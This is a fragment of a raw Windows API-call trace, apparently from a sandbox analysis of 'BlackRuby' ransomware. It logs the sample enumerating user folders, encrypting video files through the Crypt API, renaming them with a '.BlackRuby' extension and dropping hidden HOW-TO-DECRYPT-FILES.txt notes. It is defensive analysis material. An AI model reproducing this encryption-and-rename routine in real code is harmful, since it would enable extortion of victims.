ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0061.901] GetLastError () returned 0x5 [0061.901] SetErrorMode (uMode=0x0) returned 0x1 [0061.901] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0061.901] GetLastError () returned 0x5 [0061.901] SetErrorMode (uMode=0x1) returned 0x0 [0061.902] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\searches\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.902] GetLastError () returned 0x5 [0061.903] SetErrorMode (uMode=0x0) returned 0x1 [0061.903] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\SendTo", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\SendTo", lpFilePart=0x0) returned 0x17 [0061.903] GetLastError () returned 0x5 [0061.903] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.903] GetLastError () returned 0x5 [0061.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.904] GetLastError () returned 0x5 [0061.904] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\SendTo", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\SendTo", lpFilePart=0x0) returned 0x17 [0061.904] GetLastError () returned 0x5 [0061.904] SetErrorMode (uMode=0x1) returned 0x0 [0061.904] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\SendTo\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0061.904] GetLastError () returned 0x5 [0061.905] SetErrorMode (uMode=0x0) returned 0x1 [0061.905] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Start Menu", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Start Menu", lpFilePart=0x0) returned 0x1b [0061.905] GetLastError () returned 0x5 [0061.905] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.905] GetLastError () returned 0x5 [0061.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.906] GetLastError () returned 0x5 [0061.906] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Start Menu", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Start Menu", lpFilePart=0x0) returned 0x1b [0061.906] GetLastError () returned 0x5 [0061.906] SetErrorMode (uMode=0x1) returned 0x0 [0061.906] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Start Menu\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0061.906] GetLastError () returned 0x5 [0061.907] SetErrorMode (uMode=0x0) returned 0x1 [0061.907] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Templates", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Templates", lpFilePart=0x0) returned 0x1a [0061.907] GetLastError () returned 0x5 [0061.908] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.908] GetLastError () returned 0x5 [0061.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.908] GetLastError () returned 0x5 [0061.908] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Templates", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Templates", lpFilePart=0x0) returned 0x1a [0061.908] GetLastError () returned 0x5 [0061.908] SetErrorMode (uMode=0x1) returned 0x0 [0061.908] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Templates\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0061.908] GetLastError () returned 0x5 [0061.909] SetErrorMode (uMode=0x0) returned 0x1 [0061.909] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos", lpFilePart=0x0) returned 0x17 [0061.909] GetLastError () returned 0x5 [0061.910] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.910] GetLastError () returned 0x5 [0061.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.910] GetLastError () returned 0x5 [0061.910] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos", lpFilePart=0x0) returned 0x17 [0061.910] GetLastError () returned 0x5 [0061.910] SetErrorMode (uMode=0x1) returned 0x0 [0061.910] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0061.910] GetLastError () returned 0x5 [0061.910] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.910] GetLastError () returned 0x5 [0061.910] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.910] GetLastError () returned 0x5 [0061.910] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.910] GetLastError () returned 0x5 [0061.910] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.910] GetLastError () returned 0x5 [0061.911] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.911] GetLastError () returned 0x5 [0061.911] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.911] GetLastError () returned 0x5 [0061.911] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.911] GetLastError () returned 0x5 [0061.911] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.911] GetLastError () returned 0x5 [0061.911] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.911] GetLastError () returned 0x5 [0061.911] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.911] GetLastError () returned 0x12 [0061.911] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0061.912] SetErrorMode (uMode=0x0) returned 0x1 [0061.912] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos", lpFilePart=0x0) returned 0x17 [0061.912] GetLastError () returned 0x12 [0061.912] SetErrorMode (uMode=0x1) returned 0x0 [0061.912] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0061.912] GetLastError () returned 0x12 [0061.912] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.912] GetLastError () returned 0x12 [0061.912] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.912] GetLastError () returned 0x12 [0061.912] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.912] GetLastError () returned 0x12 [0061.912] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.912] GetLastError () returned 0x12 [0061.912] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.912] GetLastError () returned 0x12 [0061.913] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.913] GetLastError () returned 0x12 [0061.913] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.913] GetLastError () returned 0x12 [0061.913] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.913] GetLastError () returned 0x12 [0061.913] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.913] GetLastError () returned 0x12 [0061.913] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.913] GetLastError () returned 0x12 [0061.913] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0061.913] SetErrorMode (uMode=0x0) returned 0x1 [0061.913] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", lpFilePart=0x0) returned 0x2b [0061.913] GetLastError () returned 0x12 [0061.914] SetErrorMode (uMode=0x1) returned 0x0 [0061.914] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4" (normalized: "c:\\users\\eebsym5\\videos\\3xevzpkukzpqfgb.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1cc735c | out: lpFileInformation=0x1cc735c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ea7ded0, ftCreationTime.dwHighDateTime=0x1d356d9, ftLastAccessTime.dwLowDateTime=0x2e2db2b0, ftLastAccessTime.dwHighDateTime=0x1d3511b, ftLastWriteTime.dwLowDateTime=0x2e2db2b0, ftLastWriteTime.dwHighDateTime=0x1d3511b, nFileSizeHigh=0x0, nFileSizeLow=0x17146)) returned 1 [0061.914] GetLastError () returned 0x12 [0061.914] SetErrorMode (uMode=0x0) returned 0x1 [0061.914] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", lpFilePart=0x0) returned 0x2b [0061.914] GetLastError () returned 0x12 [0061.914] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", lpFilePart=0x0) returned 0x2b [0061.914] GetLastError () returned 0x12 [0061.914] SetErrorMode (uMode=0x1) returned 0x0 [0061.914] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4" (normalized: "c:\\users\\eebsym5\\videos\\3xevzpkukzpqfgb.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.914] GetLastError () returned 0x0 [0061.914] GetFileType (hFile=0x258) returned 0x1 [0061.914] SetErrorMode (uMode=0x0) returned 0x1 [0061.914] GetFileType (hFile=0x258) returned 0x1 [0061.914] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x17146 [0061.914] GetLastError () returned 0x0 [0061.915] ReadFile (in: hFile=0x258, lpBuffer=0x2c18760, nNumberOfBytesToRead=0x17146, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c18760*, lpNumberOfBytesRead=0x18ed84*=0x17146, lpOverlapped=0x0) returned 1 [0061.916] GetLastError () returned 0x0 [0061.916] CloseHandle (hObject=0x258) returned 1 [0061.916] GetLastError () returned 0x0 [0061.917] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", lpFilePart=0x0) returned 0x2b [0061.917] GetLastError () returned 0x0 [0061.917] SetErrorMode (uMode=0x1) returned 0x0 [0061.917] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4" (normalized: "c:\\users\\eebsym5\\videos\\3xevzpkukzpqfgb.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ea7ded0, ftCreationTime.dwHighDateTime=0x1d356d9, ftLastAccessTime.dwLowDateTime=0x2e2db2b0, ftLastAccessTime.dwHighDateTime=0x1d3511b, ftLastWriteTime.dwLowDateTime=0x2e2db2b0, ftLastWriteTime.dwHighDateTime=0x1d3511b, nFileSizeHigh=0x0, nFileSizeLow=0x17146)) returned 1 [0061.917] GetLastError () returned 0x0 [0061.917] SetErrorMode (uMode=0x0) returned 0x1 [0061.917] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0061.917] GetLastError () returned 0x0 [0061.949] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1d234f4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360aa0) returned 1 [0061.949] GetLastError () returned 0x0 [0061.949] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.949] GetLastError () returned 0x0 [0061.956] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.956] GetLastError () returned 0x0 [0061.956] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360c20) returned 1 [0061.956] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.956] GetLastError () returned 0x0 [0061.957] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1b5a690*=0x1, dwFlags=0x0) returned 1 [0061.957] GetLastError () returned 0x0 [0061.957] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1b5a65c, dwFlags=0x0) returned 1 [0061.957] GetLastError () returned 0x0 [0061.957] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c46b30*, pdwDataLen=0x18ed74*=0x17240, dwBufLen=0x17240 | out: pbData=0x2c46b30*, pdwDataLen=0x18ed74*=0x17240) returned 1 [0061.958] GetLastError () returned 0x0 [0061.958] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b5a6ec*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b5a6ec*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0061.958] GetLastError () returned 0x0 [0061.958] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b5a71c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b5a71c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0061.958] GetLastError () returned 0x0 [0061.959] CryptDestroyKey (hKey=0x360aa0) returned 1 [0061.959] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.959] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.959] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", lpFilePart=0x0) returned 0x2b [0061.959] GetLastError () returned 0x0 [0061.959] SetErrorMode (uMode=0x1) returned 0x0 [0061.959] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4" (normalized: "c:\\users\\eebsym5\\videos\\3xevzpkukzpqfgb.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.961] GetLastError () returned 0xb7 [0061.961] GetFileType (hFile=0x258) returned 0x1 [0061.961] SetErrorMode (uMode=0x0) returned 0x1 [0061.961] GetFileType (hFile=0x258) returned 0x1 [0061.963] CloseHandle (hObject=0x258) returned 1 [0061.963] GetLastError () returned 0xb7 [0061.963] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4", lpFilePart=0x0) returned 0x2b [0061.963] GetLastError () returned 0xb7 [0061.963] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\Encrypted_DecHp8nlNU8iA4gF8lDRrD0Ns2C0SGd3iz0YFciMNKUYO.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\Encrypted_DecHp8nlNU8iA4gF8lDRrD0Ns2C0SGd3iz0YFciMNKUYO.BlackRuby", lpFilePart=0x0) returned 0x59 [0061.963] GetLastError () returned 0xb7 [0061.963] SetErrorMode (uMode=0x1) returned 0x0 [0061.963] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4" (normalized: "c:\\users\\eebsym5\\videos\\3xevzpkukzpqfgb.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ea7ded0, ftCreationTime.dwHighDateTime=0x1d356d9, ftLastAccessTime.dwLowDateTime=0x2e2db2b0, ftLastAccessTime.dwHighDateTime=0x1d3511b, ftLastWriteTime.dwLowDateTime=0x2d1fa580, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17250)) returned 1 [0061.963] GetLastError () returned 0xb7 [0061.963] SetErrorMode (uMode=0x0) returned 0x1 [0061.963] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\3xeVzpKUKzPQfgb.mp4" (normalized: "c:\\users\\eebsym5\\videos\\3xevzpkukzpqfgb.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\Encrypted_DecHp8nlNU8iA4gF8lDRrD0Ns2C0SGd3iz0YFciMNKUYO.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\encrypted_dechp8nlnu8ia4gf8ldrrd0ns2c0sgd3iz0yfcimnkuyo.blackruby")) returned 1 [0061.964] GetLastError () returned 0xb7 [0061.964] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x30 [0061.964] GetLastError () returned 0xb7 [0061.964] SetErrorMode (uMode=0x1) returned 0x0 [0061.964] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.965] GetLastError () returned 0x0 [0061.965] GetFileType (hFile=0x258) returned 0x1 [0061.965] SetErrorMode (uMode=0x0) returned 0x1 [0061.965] GetFileType (hFile=0x258) returned 0x1 [0061.966] CloseHandle (hObject=0x258) returned 1 [0061.966] GetLastError () returned 0x0 [0061.966] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x30 [0061.966] GetLastError () returned 0x0 [0061.966] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0061.966] GetLastError () returned 0x0 [0061.966] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", lpFilePart=0x0) returned 0x30 [0061.967] GetLastError () returned 0x0 [0061.967] SetErrorMode (uMode=0x1) returned 0x0 [0061.967] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi" (normalized: "c:\\users\\eebsym5\\videos\\9ly87_7lnhhhoncijdqi.avi"), fInfoLevelId=0x0, lpFileInformation=0x1b774a0 | out: lpFileInformation=0x1b774a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x468e5780, ftCreationTime.dwHighDateTime=0x1d34ee4, ftLastAccessTime.dwLowDateTime=0xcd2f6790, ftLastAccessTime.dwHighDateTime=0x1d355f9, ftLastWriteTime.dwLowDateTime=0xcd2f6790, ftLastWriteTime.dwHighDateTime=0x1d355f9, nFileSizeHigh=0x0, nFileSizeLow=0x17371)) returned 1 [0061.967] GetLastError () returned 0x0 [0061.967] SetErrorMode (uMode=0x0) returned 0x1 [0061.967] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", lpFilePart=0x0) returned 0x30 [0061.967] GetLastError () returned 0x0 [0061.967] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", lpFilePart=0x0) returned 0x30 [0061.967] GetLastError () returned 0x0 [0061.967] SetErrorMode (uMode=0x1) returned 0x0 [0061.967] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi" (normalized: "c:\\users\\eebsym5\\videos\\9ly87_7lnhhhoncijdqi.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.967] GetLastError () returned 0x0 [0061.967] GetFileType (hFile=0x258) returned 0x1 [0061.967] SetErrorMode (uMode=0x0) returned 0x1 [0061.967] GetFileType (hFile=0x258) returned 0x1 [0061.967] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x17371 [0061.967] GetLastError () returned 0x0 [0061.968] ReadFile (in: hFile=0x258, lpBuffer=0x2cba700, nNumberOfBytesToRead=0x17371, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2cba700*, lpNumberOfBytesRead=0x18ed84*=0x17371, lpOverlapped=0x0) returned 1 [0061.969] GetLastError () returned 0x0 [0061.969] CloseHandle (hObject=0x258) returned 1 [0061.969] GetLastError () returned 0x0 [0061.970] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi", lpFilePart=0x0) returned 0x30 [0061.970] GetLastError () returned 0x0 [0061.970] SetErrorMode (uMode=0x1) returned 0x0 [0061.970] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\9Ly87_7LnHhHoNCijdQI.avi" (normalized: "c:\\users\\eebsym5\\videos\\9ly87_7lnhhhoncijdqi.avi"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x468e5780, ftCreationTime.dwHighDateTime=0x1d34ee4, ftLastAccessTime.dwLowDateTime=0xcd2f6790, ftLastAccessTime.dwHighDateTime=0x1d355f9, ftLastWriteTime.dwLowDateTime=0xcd2f6790, ftLastWriteTime.dwHighDateTime=0x1d355f9, nFileSizeHigh=0x0, nFileSizeLow=0x17371)) returned 1 [0061.970] GetLastError () returned 0x0 [0061.970] SetErrorMode (uMode=0x0) returned 0x1 [0061.970] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c818) returned 1 [0061.970] GetLastError () returned 0x0 [0062.005] CryptImportKey (in: hProv=0x37c818, pbData=0x1bd3468, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360de0) returned 1 [0062.005] GetLastError () returned 0x0 [0062.005] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.005] GetLastError () returned 0x0 [0062.010] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.010] GetLastError () returned 0x0 [0062.010] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0062.010] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.010] GetLastError () returned 0x0 [0062.010] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c004b4*=0x1, dwFlags=0x0) returned 1 [0062.010] GetLastError () returned 0x0 [0062.010] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c00480, dwFlags=0x0) returned 1 [0062.010] GetLastError () returned 0x0 [0062.010] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ce8f20*, pdwDataLen=0x18ed74*=0x17470, dwBufLen=0x17470 | out: pbData=0x2ce8f20*, pdwDataLen=0x18ed74*=0x17470) returned 1 [0062.011] GetLastError () returned 0x0 [0062.011] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c00510*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c00510*, pdwDataLen=0x18ed8c*=0x10) returned 1 